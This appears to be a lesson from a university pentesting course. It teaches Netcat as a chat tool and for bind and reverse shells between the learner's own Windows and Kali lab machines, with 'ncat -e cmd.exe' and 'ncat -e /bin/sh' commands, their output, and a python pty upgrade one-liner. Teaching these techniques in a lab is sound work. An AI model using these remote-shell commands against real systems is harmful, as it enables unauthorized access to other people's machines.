Skip to content

Netcat

The remote shells we have examined so far tend to be used for system admin purposes, and are unlikely to be the first part of any exploit (although if we can get user credentials, then connecting over a standard shell like SSH is incredibly useful).

In this article we look at Netcat, a tool for communicating over TCP/IP, that I have ended up using in almost every pentest or CTF I have been involved with.

What is Netcat?

Otherwise known as the 'Hackers' Swiss Army Knife', Netcat is a tool that allows us to create TCP based connections between various systems. Netcat can be used for almost any task that requires communication over a network including:

  • Connecting to a remote server
  • Transferring files
  • Port scanning
  • Banner grabbing
  • Talking to services, such as mail servers.
  • Browsing the web (this is awkward, but possible)

Installing Netcat

Netcat should be installed by default on Kali. You can check this by running :

$ncat --version
Ncat: Version 7.70 ( https://nmap.org/ncat )

If you get a response you are good to go. Otherwise install it using the Advanced Package Tool (APT).

For windows you can get a copy from https://nmap.org/ncat/. I would also recommend grabbing a copy of the statically compiled version, and keeping it. Having it there, ready to transfer to a windows box is useful in a lot of pentesting situations.

Using Netcat as a simple chat service

For our first example we will make use of Netcat as a simple chat service between our windows and Kali machines. We are going to do the following:

  • Set up a Netcat service listening on our windows machine (part 1)
  • Connect to this from our Kali VM (part 2)
  • Check it is working (part 3)

To set up Netcat to listen for incoming connections the command is:

$nc -nvlp <port>

The flags are:

  • n -- No DNS lookup
  • v -- Verbose (give us loads of debugging info)
  • l -- Listen for incoming connections
  • p -- Port to listen on

To connect to a service using Netcat we can use $nc -nv <host> <port> The n and v flags mean the same as for the listener.

Part 1: Set up the listener

On Windows open a Command terminal (run -> cmd.exe)

C:\Users\Dan Goldsmith>ncat.exe -nvlp 4444
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

Part 2: set up the client

On your Linux system start a terminal window and run:

$ncat -nv 192.168.227.128 4444
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.227.128:4444.

Part 3: Check connectivity

On the Windows box we should get a message about a new connection:

C:\Users\Dan Goldsmith>ncat.exe -nvlp 4444
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.227.1.
Ncat: Connection from 192.168.227.1:40786.

And when we type anything into the terminal, it should also appear on the other machine.

Using Netcat to create a reverse shell

Netcat also lets us connect to other processes and send their data across the network. We can use this to get a basic reverse shell on a remote system.

NOTE: Not all versions of Netcat allow this; for example nc on Debian systems stops a shell being forwarded. But nc.traditional will allow it to work. If you are unlucky enough to have a version that will not forward the shell, you will have to find another way of creating the service on the target. However, you can still use Netcat on your machine to connect to any TCP based shell.

To do this we use the -e (execute) option, and pass it the command we want to run.

Remember this will be different depending on your target architecture:

  • If it's a windows box we can pass cmd.exe
  • For Linux systems .bin/sh is a good option

Let's demo setting up a simple Bind shell to connect to our windows machine from Linux.

Bind shell: Windows Target, Linux local machine.

We start a Netcat server as before, but this time connect it to a cmd.exe process.

C:\Users\Dan Goldsmith>ncat.exe -nvlp 4444 -e cmd.exe
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

On our Linux box we simply connect to the Netcat service as before. However, this time the command prompt is forwarded to us, and we can run shell commands.

$ncat -nv 192.168.227.128 4444
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.227.128:4444.
Microsoft Windows [Version 10.0.17134.590]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\Dan Goldsmith>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 62FE-ACF3

 Directory of C:\Users\Dan Goldsmith

04/16/2019  12:25 PM    <DIR>          .
04/16/2019  12:25 PM    <DIR>          ..
11/29/2018  12:53 PM    <DIR>          .idlerc
03/04/2019  04:25 PM    <DIR>          .local
01/14/2019  08:59 PM    <DIR>          3D Objects
01/14/2019  08:59 PM    <DIR>          Contacts
01/14/2019  08:59 PM    <DIR>          Desktop
01/14/2019  08:59 PM    <DIR>          Documents
04/16/2019  12:33 PM    <DIR>          Downloads
01/14/2019  08:59 PM    <DIR>          Favorites
01/14/2019  08:59 PM    <DIR>          Links
01/14/2019  08:59 PM    <DIR>          Music
07/31/2018  10:28 AM    <DIR>          OneDrive
04/16/2019  12:29 PM    <DIR>          OneDrive - Coventry University
01/14/2019  08:59 PM    <DIR>          Pictures
01/14/2019  08:59 PM    <DIR>          Saved Games
01/14/2019  08:59 PM    <DIR>          Searches
11/15/2017  06:57 AM    <DIR>          STMicroelectronics
01/14/2019  08:59 PM    <DIR>          Videos
               0 File(s)              0 bytes
              19 Dir(s)  26,679,533,568 bytes free

C:\Users\Dan Goldsmith>

Bind shell: Linux Target, Windows host

Let's swap this around, and see what happens when we setup a bind shell on our Linux box, and connect to it via windows.

On our Linux system we run almost the same command as before, but this time use /bin/sh as the process to connect to:

$ncat -nvlp 4444 -e /bin/sh 
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

And on Windows we can connect back with:

C:\Users\Dan Goldsmith>ncat.exe -nv 192.168.227.1 4444
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.227.1:4444.
whoami
dang

NOTE: You will notice that the output from Linux systems loses formatting. This is due to the way the /bin/sh works; while it's ugly, we can still run most of the commands we would normally.

HACKING TIP: If you really can't stand the formatting, we can use python (if it is available) to give us a slightly nicer shell. The one-liner python -c "import pty; pty.spawn('/bin/bash')" will give us a Bash(like) shell.

Remote Shells

Remember, with a remote shell we get the target to connect and forward the shell to us. If we are taking this approach, we need to set things up in a different order, by getting the listener up and running first.

As an example, let's set up a remote shell from our Windows machine to the Linux box.

We first set up a listener on Linux:

$ncat -nvlp 4444
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

We then connect to this using Windows, with the -e option to forward a shell

C:\Users\Dan Goldsmith>ncat.exe -nv 192.168.227.1 4444 -e cmd.exe
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.227.1:4444.

We can see the connection coming into our Linux box, and the shell being forwarded:

$ncat -nvlp 4444
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.227.128.
Ncat: Connection from 192.168.227.128:50973.
Microsoft Windows [Version 10.0.17134.590]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\Dan Goldsmith>

In summary

Netcat is an incredibly versatile tool that I use when dealing with remote shells in most pentests / CTFs. In this article we have discussed how to use Netcat to create and connect to remote shells. We will look at some of the more advanced uses of Netcat, such as using it for file transfer and port scanning later in the course.

While Netcat remains a key part of grabbing remote shells when they have been dropped on the server, it may not be present on the system. There are many other ways we can abuse system functions to get a reverse shell. Depending on the tools and software installed the approach we take may differ.

Your task

Your task is to try connecting between your windows and Kali boxes using various remote shells.

As a minimum, make sure you are comfortable using the Netcat shell:

  • Get a remote shell from Linux to Windows
  • Get a remote shell from Windows to Linux
  • Try with both Bind and Reverse shells

Now research other types of remote shells on the web and try them out. Discuss what methods you find, and whether they worked out, in the comments

Further reading

Pentest Monkey reverse shell cheat sheet

Back to top